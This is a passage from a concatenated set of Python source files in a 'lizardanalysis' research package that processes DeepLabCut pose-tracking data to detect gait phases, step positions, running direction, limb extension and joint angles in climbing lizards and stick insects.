try:
os.makedirs(step_detection_folder)
# print("folder for curve_fitting plots created")
except OSError as e:
if e.errno != errno.EEXIST:
raise
if relative == True:
plt.savefig(os.path.join(step_detection_folder, f"steps_{filename_title}_{foot}_rel.pdf"))
else:
plt.savefig(os.path.join(step_detection_folder, f"steps_{filename_title}_{foot}.pdf"))
# plt.show()
plt.close()
return intersections_dict
def remove_standing_intersections(intersection_dict, foot_function, body_function):
"""
NOT USED ATM
"""
from scipy.integrate import quad
# TODO: find functions for foot and body curves
# use area underneath curve between intersection points.
# If area smaller than 5% of the area before, remove index after that
idxs = intersection_dict['idx']
signs = intersection_dict['sign']
areas = []
for i in range(1, len(idxs) - 1):
# set integral limits
a = idxs[i - 1]
b = idxs[i]
if signs[i] > 0: # if sign is positive, foot curve will be greater than body curve, hence integral(foot-body)
f = foot_function
g = body_function
else: # if sign is negative, body curve will be greater, hence integral(body-foot)
f = body_function
g = foot_function
# calculate the area between the two curves: Intergal((f(x)-g(x))dx)
area = quad((f - g), a, b)
areas.append(area)
# check subsequent area sizes to discard idx:
return intersection_dict
class StridesAndStances:
"""
class to detect stride and stance phases for current feet => initialize class instance for every foot.
This method iterates through all frames, if the current frame is one of the intersection points, the sign of the
point will be checked. If the sign is positive the phase will be set to swing and the swing_phase_counter increased
by 1. All frames until the next intersection will be assigned that phase name and number.
Rows before and after first and last index respectively will be filled with np.nan.
"""
def __init__(self):
import numpy as np
self.stride_phase_counter = 0
self.stance_phase_counter = 0
self.phase = 'UNKNOWN'
self.current_phase = np.nan
def determine_stride_phases(self, intersection_dict, data_rows_count):
"""
Function to detect the swing or stance phases using the intersection points and their signs.
Return: list with one entry for every row.
"""
import numpy as np
# create empty list with length of data rows count:
results = np.full((data_rows_count,), '', dtype='S10')
index = 0
for row in range(data_rows_count):
# switch swing or stance depending on sign of intersection point
if row in intersection_dict['idx']:
index = intersection_dict['idx'].index(row) # find the index in list of current idx
sign = intersection_dict['sign'][index] # find the respective sign
# if sign is positive, the phase till next idx will be swing
self.current_phase = self.assign_swing_or_stance(sign)
# fill all rows until next idx with that swing or stance number
results[row] = self.current_phase
# fill all rows after last idx with np.nan
if index != 0:
results[intersection_dict['idx'][index]:] = np.nan
# print("results: ", results)
return results
# Todo: Go through intersection_dict and assign correct swing or stance phase for every row
def assign_swing_or_stance(self, sign):
if sign > 0: # swing
if self.phase == 'stance' or self.phase == 'UNKNOWN':
self.stride_phase_counter += 1
self.phase = 'swing' # originally called stride
retval = f'swing{self.stride_phase_counter:04d}'
else: # stance
if self.phase == 'swing' or self.phase == 'UNKNOWN':
self.stance_phase_counter += 1
self.phase = 'stance'
retval = f'stance{self.stance_phase_counter:04d}'
return retval
def __str__(self):
return f"swings: {self.stride_phase_counter}, stances: {self.stance_phase_counter}"
def plot_footfall_pattern(results, data_rows_count, filename, plotting_footfall_folder):
"""
takes the result dataframe and creates a new dataframe for plotting. Every foot gets assigned an individual number.
The dataframe is then filtered for strings containing "stride", the strides get replaced by the respective number,
while all stances will be NaN.
In the plot strides are therefore displayed as bars and stances are empty.
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
from matplotlib.patches import Patch
import os
import errno
df_plot = pd.DataFrame(columns=results.keys(), index=range(data_rows_count))
# filter here and only fill in stances as numbers => stances bars, strides white
for i, key in enumerate(results):
df_plot[key] = [i + 1 if s.startswith(b'stance') else np.NaN for s in results[key]]
key_list = [key for key in df_plot.columns]
colors = False
if colors:
cmap = plt.cm.coolwarm
legend_elements = [Line2D([0], [0], color=cmap(0.), lw=4, label=key_list[0]),
Line2D([0], [0], color=cmap(.33), lw=4, label=key_list[1]),
Line2D([0], [0], color=cmap(.66), lw=4, label=key_list[2]),
Line2D([0], [0], color=cmap(1.), lw=4, label=key_list[3]),
Line2D([0], [0], color='black', lw=4, label='stance phases'),
Line2D([0], [0], color='white', lw=4, label='stride phases')]
fig, ax = plt.subplots()
df_plot.plot(linewidth=10, color=cmap(np.linspace(0, 1, 5)), ax=ax)
ax.legend(handles=legend_elements)
else:
legend_elements = [Line2D([0], [0], color='white', lw=1, label='1 = FL | 2 = FR | 3 = HR | 4 = HL'),
Line2D([0], [0], color='black', lw=4, label='stance phases'),
Line2D([0], [0], color='white', lw=4, label='stride phases')]
fig, ax = plt.subplots()
df_plot.plot(linewidth=10, color='black', ax=ax)
ax.legend(handles=legend_elements)
# saves footfall pattern diagrams as pdf in defined result folder. If folder is not extant yet, it will be created
try:
os.makedirs(plotting_footfall_folder)
except OSError as e:
if e.errno != errno.EEXIST:
raise
plt.savefig(os.path.join(plotting_footfall_folder, "{}.pdf".format(filename)))
plt.clf()
plt.close()
```
#### File: lizardanalysis/calculations/aep_pep_test.py
```python
def aep_pep_test(**kwargs):
"""
Calculates two different things:
1.) The x and y coordinates of the AEP and PEP, relative to the coxa of a respective leg
2.) The swing phases and the stance phases, identifying on a frame by frame basis
Return: results data frame with 30 key value pairs:
x6 allocation of swing and stance phases for each foot/leg
x6 x coordinates of AEP for each foot/leg
x6 y coordinates for AEP for each foot/leg
x6 x coordinates for PEP for each foot/leg
x6 y coordinates for PEP for each foot/leg
"""
import os.path
import pandas as pd
from pandas import np
from pathlib import Path
from lizardanalysis.utils import animal_settings
from scipy import signal
import math
# print("footfall_by_switches")
# define necessary **kwargs:
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
config = kwargs.get('config')
filename = kwargs.get('filename')
likelihood = kwargs.get('likelihood')
animal = kwargs.get('animal')
df_result_current = kwargs.get('df_result_current')
# added in this so that you can get the estimated values from alpha
# so long as that column currently resides in the data frame
config_file = Path(config).resolve()
# result folder for footfall plots
step_detection_folder = os.path.join(str(config_file).rsplit(os.path.sep, 1)[0], "analysis-results",
"step_detection")
# create file path for foot fall pattern diagrams
plotting_footfall_folder = os.path.join(step_detection_folder, "footfall-pattern-diagrams")
# TODO: instead of hard-coding the feet and the three points for body_motion,
# TODO: let the user choose based on labels available in DLC result file: Choose feet & choose body motion
scorer = data.columns[1][0]
feet = animal_settings.get_list_of_feet(animal)
relative = False
plotting_footfall_patterns = True
# define cut-off value -> crops X% of frames on each side of video
p_cut_off = 0.05
body_motion = {"frame": [], "mean_motion_x": []}
abdomen_diff = 0
head_diff = 0
# assuming that the body from the head to the abdomen is rigid?
# this for loop is used to calculate the x coordinate difference between a given frame and the previous
# therefore gives you can indicator of the direction of motion
# if the [row] - [row-1] > 0 , then the stick insect is moving to the right
# if the [row] - [row-1] < 0, then the stick insect is moving to the left
for row in range(1, data_rows_count):
if data.loc[row][scorer, "head", 'likelihood'] >= likelihood and data.loc[row - 1][
scorer, "head", 'likelihood'] >= likelihood:
head_diff = data.loc[row][scorer, "head"] - data.loc[row - 1][scorer, "head"]
if data.loc[row][scorer, "abdomen", 'likelihood'] >= likelihood and data.loc[row - 1][
scorer, "abdomen", 'likelihood'] >= likelihood:
abdomen_dif = data.loc[row][scorer, "abdomen"] - data.loc[row - 1][scorer, "abdomen"]
body_motion["frame"].append(row - 1)
body_motion["mean_motion_x"].append(abs((head_diff + abdomen_diff) / 2.0))
# am taking the absolute value, because if the stick insect walks to the left, then you don't want to
# switch the which sign changes indicates swing/pep and which sign change indicates stance/aep.
# taking the average of the differences, to determine the average 'speed' i.e. the displacement over one frame of the whole body
# one class instance and one result array for every foot, since every foot needs its own counter
calculators = {}
results = {}
# for every foot, need to do within the original for loop, so all foot calculations are performed for a given frame
foot_motions = {}
rel_foot_motions = {}
# left the for loop for the body motion, and will now be working with for loops for the foot motion
for foot in feet:
foot_motions[f"{foot}"] = []
rel_foot_motions[f"rel_{foot}"] = []
# if the [row] - [row-1] > 0 , then the stick insect FOOT is moving to the right
# if the [row] - [row-1] < 0, then the stick insect FOOT is moving to the left
# taking an absolute value for the body and foot motions avoid issues with directions (?)
foot_motion = 0
for row in range(1, data_rows_count):
if data.loc[row][scorer, f"{foot}", 'likelihood'] >= likelihood and data.loc[row - 1][scorer,
f"{foot}",'likelihood'] >= likelihood:
foot_motion = abs(data.loc[row][scorer, f"{foot}", 'x'] - data.loc[row - 1][
scorer, f"{foot}", 'x'])
foot_motions[f"{foot}"].append(foot_motion)
rel_foot_motions[f"rel_{foot}"].append(foot_motion - body_motion['mean_motion_x'][row - 1])
else:
foot_motions[f"foot"].append
# now need to store the body motion data, the foot motion data, and the relative foot motion all in a dataframe
# this dataframe within the loop is only for one foot
dict_df = {'body_motion': body_motion['mean_motion_x'], 'foot_motion': foot_motions[f"{foot}"],
"rel_foot_motion": rel_foot_motions[f"rel_{foot}"]}
print(dict_df)
df = pd.DataFrame.from_dict(dict_df)
intersections = smooth_and_plot(df, data_rows_count, p_cut_off, relative, foot, filename,
step_detection_folder)
######################################################################################################################
# the smooth_and_plot function returns 'intersection_dict'
# intersection dict is: {"idx":[], "sign":[]}
# idx = the idx of the number list/array of differences in the sign, only storing when the differences are non-zero
# sign = stores the sign of the number associated with the index of the non zero number
# positive => start of swing =>PEP
# negative => start of stance => AEP
# gives the alpha_estimation values for the
rom_list = [col for col in df_result_current.columns if ("rom_angle_{}".format(foot) in col)]
aep_pep_angle = []
# for loop will calculate the angle that defines the femur-coxa vector relative to the normal
# to the body axis, running through the coxa of the foot of interest
for angle in range(len(rom_list)):
aep_pep_angle.append(90 - angle)
foot_chars = list(foot)
f_t_joint_lpx = []
f_t_joint_lpy = []
t_c_joint_lpx = []
t_c_joint_lpy = []
# low pass filter application of the coordinate data alone?
# is this necessary
b, a = signal.butter(3, 0.1, btype='lowpass', analog=False)
f_t_joint_lpx = signal.filtfilt(b, a,
(data.loc[:, (scorer, "{}m{}".format(foot_chars[0], foot_chars[1]), "x")]))
f_t_joint_lpy = signal.filtfilt(b, a,
(data.loc[:, (scorer, "{}m{}".format(foot_chars[0], foot_chars[1]), "y")]))
t_c_joint_lpx = signal.filtfilt(b, a,
(data.loc[:, (scorer, "{}b{}".format(foot_chars[0], foot_chars[1]), "x")]))
t_c_joint_lpy = signal.filtfilt(b, a,
(data.loc[:, (scorer, "{}b{}".format(foot_chars[0], foot_chars[1]), "y")]))
# ensuring that the values for the keys are defined as arrays, so that you can append for the
# following for loop
results_aep = {"{}_x".format(foot): [], "{}_y".format(foot): []}
results_pep = {"{}_x".format(foot): [], "{}_y".format(foot): []}
for i in range(2, data_rows_count):
if i - 2 in intersections["idx"]:
# atm just leaving the likelihood check
# is it worth doing, considering the alpha angles depended on those likelihoods anyway?
# so you would be just checking the same likelihood even though
# now calculating the Euclidean distance between the coxa label and the femur label
f_t_joint_co = (f_t_joint_lpx[i], f_t_joint_lpy[i])
t_c_joint_co = (t_c_joint_lpx[i], t_c_joint_lpy[i])
distance = np.sqrt(
(f_t_joint_co[0] - t_c_joint_co[0]) ** 2 + (f_t_joint_co[1] - t_c_joint_co[1]) ** 2)
# calibrate distance with conversion factor
# NEED TO WRITE THE CONVERSION FACTOR!
distance_calib = distance # / conv_fac
# results_aep = {}
# results_pep = {}
if intersections["sign"][i - 2] > 0:
# this means you are transitioning to the swing phase, so should be PEP
results_pep[f"{foot}_x"].append((math.cos(aep_pep_angle[i]) * distance_calib))
results_pep[f"{foot}_y"].append((math.sin(aep_pep_angle[i]) * distance_calib))
if intersections["sign"][i - 2] < 0:
# this means you are transitioning to the stance phase so should be aep
results_aep[f"{foot}_x"].append((math.cos(aep_pep_angle[i]) * distance_calib))
results_aep[f"{foot}_y"].append((math.sin(aep_pep_angle[i]) * distance_calib))
# therefore should now have two dictionaries that contain the x coordinates and the y coordinates
# of the aep and the pep for each foot
# one aep value and one pep value per stepping cycle
#####################################################################################################################
# initializes class instance for every foot and empty result dict to be filled with the swing and stance phases:
calculators[foot] = StridesAndStances()
# "S10" = string of 10 characters: stance/stride + counter 000n
results[foot] = calculators[foot].determine_stride_phases(intersections, data_rows_count)
# rename dictionary keys of results
results = {'stepphase_' + key: value for (key, value) in results.items()}
results_aep = {"AEP_" + key: value for (key, value) in results_aep.items()}
results_pep = {"PEP_" + key: value for (key, value) in results_pep.items()}
# print("results: ", results)
if plotting_footfall_patterns:
""" plots a foot fall pattern diagram for every DLC result csv file/every lizard run """
plot_footfall_pattern(results, data_rows_count, filename, plotting_footfall_folder)
## need to add the result of the code here!
# last step must be combining the three results dictionaries
results.update(results_aep)
results.update(results_pep)
return results
# shouldn't matter whether the stick insect walks in a straight horizontal line or not, because you're only looking at
# the switch in the direction of movement
# therefore, as long as the insect doesn't walk completely vertically suddenly, then the algorithm should still work
def smooth_and_plot(df, data_rows_count, p_cut_off, relative, foot, filename, step_detection_folder, plotting=True):
# smoothing of the raw input data from foot motion and body motion, using the Butterworth low-pass filter an a Savintzky-
# Golay smoothing alogirthm. Then, the intersection points are computed between the smoothed body and foot curves
# If relative is TRUE: body motion is already subtracted from the foot motion, hence foot is relative to the x-axis
# If relative is FALSE: the intersection of the foot motion and body motion data curves needs to be determined
import numpy as np
import matplotlib.pyplot as plt
from scipy import signal
import os
import errno
# savgol filter smoothing window (must be odd!)
smooth_wind = 13
x_cut_off_value = int(round(data_rows_count * p_cut_off, 0))
x = np.linspace(0, data_rows_count - 1, data_rows_count - 1)
b, a = signal.butter(3, 0.1, btype='lowpass', analog=False)
x_cut_off = np.linspace(x_cut_off_value, data_rows_count - 1, int(data_rows_count - 1 - x_cut_off_value))
if plotting == True:
# initiate plot
plt.figure()
plt.axvline(x_cut_off_value, color='black', label='cutoff 0.05%')
if relative == True:
"""Uses the relative foot motion i.e. the foot motion where body motion has been subtracted"""
rel_foot_motion_low_passed = signal.filtfilt(b, a, df['rel_foot_motion'])
# smooth curves with Savitzky-Golay filter:
y_foot_rel = df.loc[x_cut_off_value:, 'rel_foot_motion']
y_foot_rel_lp = rel_foot_motion_low_passed[x_cut_off_value:] # two different types of filtering (?)
# smooth without the low pass filter
y_foot_rel_smoothed = signal.savgol_filter(y_foot_rel, smooth_wind, 3)
# smooth with the low pass filter
y_foot_rel_lp_smoothed = signal.savgol_filter(y_foot_rel_lp, smooth_wind, 3)
x_axis_f = np.zeros(data_rows_count - 1 - x_cut_off_value)
# get the indexes of the frames where you are transitioning from swing -> stance or stance -> swing
idx = np.argwhere(np.diff(np.sign(x_axis_f - y_foot_rel_smoothed))).flatten()
intersections_dict = {"idx": [], "sign": []}
for i in idx:
intersections_dict["idx"].append(i)
intersections_dict["sign"].append(np.sign(x_axis_f[i] - y_foot_rel_smoothed[i]))
intersections_dict["idx"] = [b + x_cut_off_value for b in intersections_dict['idx']]
if plotting == True:
df['rel_foot_motion'].plot(color='#f5c242') # plot_rel_foot
plt.plot(x, rel_foot_motion_low_passed, color='green', label='rel_foot_motion low pass (lp) filter')
plt.plot(x_cut_off, y_foot_rel_smoothed, color='red', label='rel_foot_motion_smoothed')
plt.plot(x_cut_off, y_foot_rel_lp_smoothed, color='lightgreen', label='rel_foot_motion_lp_smoothed')
plt.plot(x_cut_off[idx], y_foot_rel_lp_smoothed[idx], 'ko') # plot intersection points
# edit here -> second argument was changed from x_axis_f to y_foot_rel_lp_smoothed
for i in range(len(intersections_dict['idx'])):
plt.annotate(intersections_dict['idx'][i],
(x_cut_off[intersections_dict['idx'][i] - x_cut_off_value] - 5,
y_foot_rel_lp_smoothed[intersections_dict['idx'][i] - x_cut_off_value] + 3))
# another edit here?
else:
"""
Uses the foot motion and the body motion and computes the intersection points for the smoothed curves.
Intersection points for the lizard standing (bodymotion -> 0) will get excluded by using a body-motion threshold
of 10% of max(body_motion_lp_smoothed).
"""
# lowpass filter for body motion
body_motion_low_passed = signal.filtfilt(b, a, df['body_motion'])
# lowpass filter for foot motion
foot_motion_low_passed = signal.filtfilt(b, a, df['foot_motion'])
# smooth curves:
y_body = df.loc[x_cut_off_value:, 'body_motion']
y_body_lp = body_motion_low_passed[x_cut_off_value:]
y_foot = df.loc[x_cut_off_value:, 'foot_motion']
y_foot_lp = foot_motion_low_passed[x_cut_off_value:]
# smooth original body motion without low pass filter
y_body_smoothed = signal.savgol_filter(y_body, 51, 3)
# smooth low-pass-filtered body motion
y_body_lp_smoothed = signal.savgol_filter(y_body_lp, 17, 3)
# smooth original foot motion without low pass filter
y_foot_smoothed = signal.savgol_filter(y_foot, 17, 3)
# smooth low-pass-filtered rel foot motion
y_foot_lp_smoothed = signal.savgol_filter(y_foot_lp, 17, 3)
# compute and plot intersection points:
idx = np.argwhere(np.diff(np.sign(y_body_lp_smoothed - y_foot_lp_smoothed))).flatten()
intersections_dict = {"idx": [], "sign": []}
max_body_motion = max([abs(max(y_body_lp_smoothed)), abs(min(y_body_lp_smoothed))])
body_motion_stand = round(max_body_motion * 0.1, 2)
# print(f"max body motion: {max_body_motion}, 10%: {body_motion_stand}")
for i in idx:
# exclude all intersections which are within 0+-1% of max body motion (~standing)
if abs(y_body_lp_smoothed[i]) >= body_motion_stand:
intersections_dict["idx"].append(i)
intersections_dict["sign"].append(np.sign(y_body_lp_smoothed[i] - y_foot_lp_smoothed[i]))
intersections_dict['idx'] = [b + x_cut_off_value for b in intersections_dict['idx']]
# print("x intersections: ", intersections_dict)
# remove intersection points when lizard has stopped walking (usually in the end):
# intersections_dict = remove_standing_intersections(intersections_dict, y_body_lp_smoothed, y_foot_lp_smoothed)
if plotting == True:
df['body_motion'].plot(color='#3089db') # plot body motion
df['foot_motion'].plot(color='#d68f00') # plot foot motion
plt.plot(x, body_motion_low_passed, color='lightblue', label='body_motion low pass (lp) filter')
plt.plot(x, foot_motion_low_passed, color='green', label='foot_motion low pass (lp) filter')
plt.plot(x_cut_off, y_body_smoothed, color='#160578', label='body_motion_smoothed')
plt.plot(x_cut_off, y_foot_smoothed, color='red', label='foot_motion_smoothed')
plt.plot(x_cut_off, y_body_lp_smoothed, color='#9934b3', label='body_motion_lp_smoothed')
plt.plot(x_cut_off, y_foot_lp_smoothed, color='lightgreen', label='foot_motion_lp_smoothed')
plt.plot(x_cut_off[idx], y_body_lp_smoothed[idx], 'ko') # plot intersection points
for i in range(len(intersections_dict['idx'])):
plt.annotate(intersections_dict['idx'][i],
(x_cut_off[intersections_dict['idx'][i] - x_cut_off_value] - 5,
y_body_lp_smoothed[intersections_dict['idx'][i] - x_cut_off_value] + 3))
if plotting == True:
# set y-limits, add legend and display plots
plt.axhline(0, color='black')
plt.ylim(-30, 30)
plt.legend()
plt.xlabel('frames')
plt.ylabel('dx/frame')
filename_title = filename.split("_", 2)[:2]
filename_title = filename_title[0] + filename_title[1]
plt.title(f"{filename_title}-{foot}")
# plt.show()
try:
os.makedirs(step_detection_folder)
# print("folder for curve_fitting plots created")
except OSError as e:
if e.errno != errno.EEXIST:
raise
if relative == True:
plt.savefig(os.path.join(step_detection_folder, f"steps_{filename_title}_{foot}_rel.pdf"))
else:
plt.savefig(os.path.join(step_detection_folder, f"steps_{filename_title}_{foot}.pdf"))
# plt.show()
plt.close()
return intersections_dict
## removed the unused function, might need to put back in at some point
class StridesAndStances:
"""
class to detect stride and stance phases for current feet => initialize class instance for every foot.
This method iterates through all frames, if the current frame is one of the intersection points, the sign of the
point will be checked. If the sign is positive the phase will be set to swing and the swing_phase_counter increased
by 1. All frames until the next intersection will be assigned that phase name and number.
Rows before and after first and last index respectively will be filled with np.nan.
"""
def __init__(self):
import numpy as np
self.stride_phase_counter = 0
self.stance_phase_counter = 0
self.phase = 'UNKNOWN'
self.current_phase = np.nan
def determine_stride_phases(self, intersection_dict, data_rows_count):
"""
Function to detect the swing or stance phases using the intersection points and their signs.
Return: list with one entry for every row.
"""
import numpy as np
# create empty list with length of data rows count:
results = np.full((data_rows_count,), '', dtype='S10')
index = 0
for row in range(data_rows_count):
# switch swing or stance depending on sign of intersection point
if row in intersection_dict['idx']:
index = intersection_dict['idx'].index(row) # find the index in list of current idx
sign = intersection_dict['sign'][index] # find the respective sign
# if sign is positive, the phase till next idx will be swing
self.current_phase = self.assign_swing_or_stance(sign)
# fill all rows until next idx with that swing or stance number
results[row] = self.current_phase
# fill all rows after last idx with np.nan
if index != 0:
results[intersection_dict['idx'][index]:] = np.nan
# print("results: ", results)
return results
# Todo: Go through intersection_dict and assign correct swing or stance phase for every row
def assign_swing_or_stance(self, sign):
if sign > 0: # swing
if self.phase == 'stance' or self.phase == 'UNKNOWN':
self.stride_phase_counter += 1
self.phase = 'swing' # originally called stride
retval = f'swing{self.stride_phase_counter:04d}'
else: # stance
if self.phase == 'swing' or self.phase == 'UNKNOWN':
self.stance_phase_counter += 1
self.phase = 'stance'
retval = f'stance{self.stance_phase_counter:04d}'
return retval
def __str__(self):
return f"swings: {self.stride_phase_counter}, stances: {self.stance_phase_counter}"
def plot_footfall_pattern(results, data_rows_count, filename, plotting_footfall_folder):
"""
takes the result dataframe and creates a new dataframe for plotting. Every foot gets assigned an individual number.
The dataframe is then filtered for strings containing "stride", the strides get replaced by the respective number,
while all stances will be NaN.
In the plot strides are therefore displayed as bars and stances are empty.
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from matplotlib.lines import Line2D
from matplotlib.patches import Patch
import os
import errno
df_plot = pd.DataFrame(columns=results.keys(), index=range(data_rows_count))
# filter here and only fill in stances as numbers => stances bars, strides white
for i, key in enumerate(results):
df_plot[key] = [i + 1 if s.startswith(b'stance') else np.NaN for s in results[key]]
key_list = [key for key in df_plot.columns]
colors = False
if colors:
cmap = plt.cm.coolwarm
legend_elements = [Line2D([0], [0], color=cmap(0.), lw=4, label=key_list[0]),
Line2D([0], [0], color=cmap(.33), lw=4, label=key_list[1]),
Line2D([0], [0], color=cmap(.66), lw=4, label=key_list[2]),
Line2D([0], [0], color=cmap(1.), lw=4, label=key_list[3]),
Line2D([0], [0], color='black', lw=4, label='stance phases'),
Line2D([0], [0], color='white', lw=4, label='stride phases')]
fig, ax = plt.subplots()
df_plot.plot(linewidth=10, color=cmap(np.linspace(0, 1, 5)), ax=ax)
ax.legend(handles=legend_elements)
else:
legend_elements = [Line2D([0], [0], color='white', lw=1, label='1 = FL | 2 = FR | 3 = HR | 4 = HL'),
Line2D([0], [0], color='black', lw=4, label='stance phases'),
Line2D([0], [0], color='white', lw=4, label='stride phases')]
fig, ax = plt.subplots()
df_plot.plot(linewidth=10, color='black', ax=ax)
ax.legend(handles=legend_elements)
# saves footfall pattern diagrams as pdf in defined result folder. If folder is not extant yet, it will be created
try:
os.makedirs(plotting_footfall_folder)
except OSError as e:
if e.errno != errno.EEXIST:
raise
plt.savefig(os.path.join(plotting_footfall_folder, "{}.pdf".format(filename)))
plt.clf()
plt.close()
```
#### File: lizardanalysis/calculations/direction_of_running.py
```python
import pandas as pd
import numpy as np
from numpy import array
import math
def direction_of_running(**kwargs):
"""
Uses the Head tracking point to determine the direction of climbing.
Depending on the clicked value, which determines the configuration of the lizard climbing direction in the videos:
- RIGHT: = increasing x
- LEFT: = decreasing x
:param data: pandas DataFrame with the current DLC results read in from csv
:return direction of running as string "RIGHT" or "LEFT"
"""
data = kwargs.get("data")
data_row_count = kwargs.get("data_rows_count")
scorer = data.columns[1][0]
#print('scorer: ', scorer)
#TODO: filter columns of used labels for likelihood BEFORE calculation
likelihood = 0.90
#nose_coords = data[scorer, 'Nose']
#nose_coords = nose_coords[nose_coords.likelihood >= 0.90]
head_coords = data[scorer, 'Head', 'x']
#print(nose_coords.head())
if head_coords.iloc[-1] > head_coords.iloc[0]:
direction = "RIGHT"
elif head_coords.iloc[-1] < head_coords.iloc[0]:
direction = "LEFT"
else:
direction = "Direction can't be determined"
direction_list = np.array(data_row_count*[direction], dtype=np.string_)
direction_list = [direction_encode_and_strip(direction) for direction in direction_list]
return {__name__.rsplit('.', 1)[1]: direction_list}
def direction_encode_and_strip(bytestring):
# get rid of b"..." for direction
if bytestring == b'RIGHT':
direction = "RIGHT"
elif bytestring == b'LEFT':
direction = "LEFT"
else:
print("no known direction found")
direction = "UNKNOWN"
return direction
```
#### File: lizardanalysis/calculations/extension_or_flexion_phase.py
```python
def extension_or_flexion_phase(**kwargs):
import numpy as np
from lizardanalysis.utils import auxiliaryfunctions
from lizardanalysis.utils import animal_settings
# get kwargs:
df_result_current = kwargs.get('df_result_current')
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
filename = kwargs.get("filename")
animal = kwargs.get("animal")
likelihood = kwargs.get("likelihood")
feet = animal_settings.get_list_of_feet(animal)
scorer = data.columns[1][0]
### CALCULATION:
results = {}
for foot in feet:
results[foot] = np.full((data_rows_count,), 0.0, dtype='float')
# read in rows with 'ext-flex-dist_{foot}':
ext_flex_columns_list = [col for col in df_result_current.columns if ('ext-flex-dist_' in col)]
#print("ext_flex_columns_list ", ext_flex_columns_list)
# read the columns one by one and calculate the subsequent diff in distances:
for col, foot in zip(ext_flex_columns_list, feet):
# test if foot is in column name:
if foot in col:
current_col = df_result_current[col]
# calculate the distence between subsequent frames:
diff_col = current_col.diff()
# replace positve differences with 'ext' and negative with 'flex'
# flex = dist between base and tip becomes smaller = df.diff() -> row - (row-1) = negative diff
diff_col[diff_col > 0.0] = int(1)
diff_col[diff_col <= 0.0] = int(0)
diff_col[diff_col == 1] = 'ext'
diff_col[diff_col == 0] = 'flex'
#print("diff_col new ", diff_col)
# write phase list into result dataframe:
# saves distance for current frame in result dict
results[foot] = diff_col
else:
print("foot does not match with current column name!")
break
results = {'ext-flex-phase_' + key: value for (key, value) in results.items()}
return results
```
#### File: lizardanalysis/calculations/hip_and_shoulder_angles.py
```python
def hip_and_shoulder_angles(**kwargs):
"""
calculates the shoulder and hip angles for every frame.
Shoulder angle: angle between shoulder vector (FORE: Shoulder<->Shoulder_foot or HIND: Hip<->Shoulder_foot)
and limb vector (Shoulder_foot<->foot_knee)
:param kwargs: different parameters needed for calculation
:return: results dataframe with 4 key value pairs (list of frame-wise angles for every foot)
"""
import numpy as np
from lizardanalysis.utils import auxiliaryfunctions
from lizardanalysis.utils import animal_settings
#print('HIP AND SHOULDER ANGLE CALCULATION')
# define necessary **kwargs:
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
likelihood = kwargs.get('likelihood')
filename = kwargs.get('filename')
animal = kwargs.get('animal')
scorer = data.columns[1][0]
feet = animal_settings.get_list_of_feet(animal)
results = {}
for foot in feet:
results[foot] = np.full((data_rows_count,), np.NAN)
for i in range(data_rows_count):
# test for likelihoods:
shoulder_likelihood = data.loc[i][scorer, "Shoulder", "likelihood"]
shoulder_foot_likelihood = data.loc[i][scorer, "Shoulder_{}".format(foot), "likelihood"]
knee_foot_likelihood = data.loc[i][scorer, "{}_knee".format(foot), "likelihood"]
hip_likelihood = data.loc[i][scorer, "Hip", "likelihood"]
# get shoulder vector (shoulder - shoulder_foot or hip - shoulder_foot)
if foot == "FR" or foot == "FL":
# only calculate if likelihoods of involved tracking points are good enough else nan
if shoulder_likelihood >= likelihood and shoulder_foot_likelihood >= likelihood:
shoulder_vector = ((data.loc[i, (scorer, "Shoulder", "x")]
- data.loc[i, (scorer, "Shoulder_{}".format(foot), "x")]),
(data.loc[i, (scorer, "Shoulder", "y")]
- data.loc[i, (scorer, "Shoulder_{}".format(foot), "y")]))
#print("shoulder vector: ", shoulder_vector)
else:
shoulder_vector = (np.nan, np.nan)
else: # use HIP
# only calculate if likelihoods of involved tracking points are good enough else nan
if hip_likelihood >= likelihood and shoulder_foot_likelihood >= likelihood:
shoulder_vector = ((data.loc[i, (scorer, "Hip", "x")]
- data.loc[i, (scorer, "Shoulder_{}".format(foot), "x")]),
(data.loc[i, (scorer, "Hip", "y")]
- data.loc[i, (scorer, "Shoulder_{}".format(foot), "y")]))
#print("hip vector: ", shoulder_vector)
else:
shoulder_vector = (np.nan, np.nan)
# get limb vector (shoulder_foot - foot_knee)
if shoulder_foot_likelihood >= likelihood and knee_foot_likelihood >= likelihood:
limb_vector = ((data.loc[i, (scorer, "Shoulder_{}".format(foot), "x")]
- data.loc[i, (scorer, "{}_knee".format(foot), "x")]),
(data.loc[i, (scorer, "Shoulder_{}".format(foot), "y")]
- data.loc[i, (scorer, "{}_knee".format(foot), "y")]))
#print("limb vector: ", limb_vector)
else:
limb_vector = (np.nan, np.nan)
#print("shoulder vector, limb vector: ", shoulder_vector, limb_vector)
# calculate the shoulder/hip angle
shoulder_angle = auxiliaryfunctions.py_angle_betw_2vectors(shoulder_vector, limb_vector)
#print("shoulder angle: ", shoulder_angle)
results[foot][i] = 180.0 - shoulder_angle
# rename dictionary keys of results
results = {'shoulder_angle_' + key: value for (key, value) in results.items()}
return results
```
#### File: lizardanalysis/calculations/lizards_feet_width_and_height.py
```python
def lizards_feet_width_and_height(**kwargs):
"""
calculates the vertical and horizontal distance between the FR and HL foot during mid-stance.
The distances are calculated along the x and y axis of the video, hence if the lizard climbs at an angle the
widths and heights might deviate. Use the body_axis_deflection_angle calculation first to get the lizards deflection
from the vertical and use this as an indicator if values should be excluded in post-analysis.
This script filters for deflections <= 15 deg if body_axis_deflection_angle is included in selected calculations.
:param kwargs:
:return:
"""
print("spreading")
# TODO: do the width for fore and hind feet individually
### imports
import numpy as np
import pandas as pd
from lizardanalysis.utils import animal_settings, auxiliaryfunctions
# -------------------- only includes stride lengths longer (>) than... (TODO: make config parameter)
threshold_stride_len = 4
# --------------------
### setup
data = kwargs.get('data')
data_rows_count = kwargs.get('data_rows_count')
df_result_current = kwargs.get('df_result_current')
likelihood = kwargs.get('likelihood')
animal = kwargs.get('animal')
filename = kwargs.get('filename')
scorer = data.columns[1][0]
feet = animal_settings.get_list_of_feet(animal)
forefeet = [foot for foot in feet if "F" in foot]
#print("forefeet: ", forefeet)
max_step_phase_count = 1000
filter_deflection = False
if "body_deflection_angle" in df_result_current.columns:
filter_deflection = True
#print("filter_deflection = ", filter_deflection)
active_columns = []
for foot in forefeet:
active_columns.append("stepphase_{}".format(foot))
##################################################################################################
results = {}
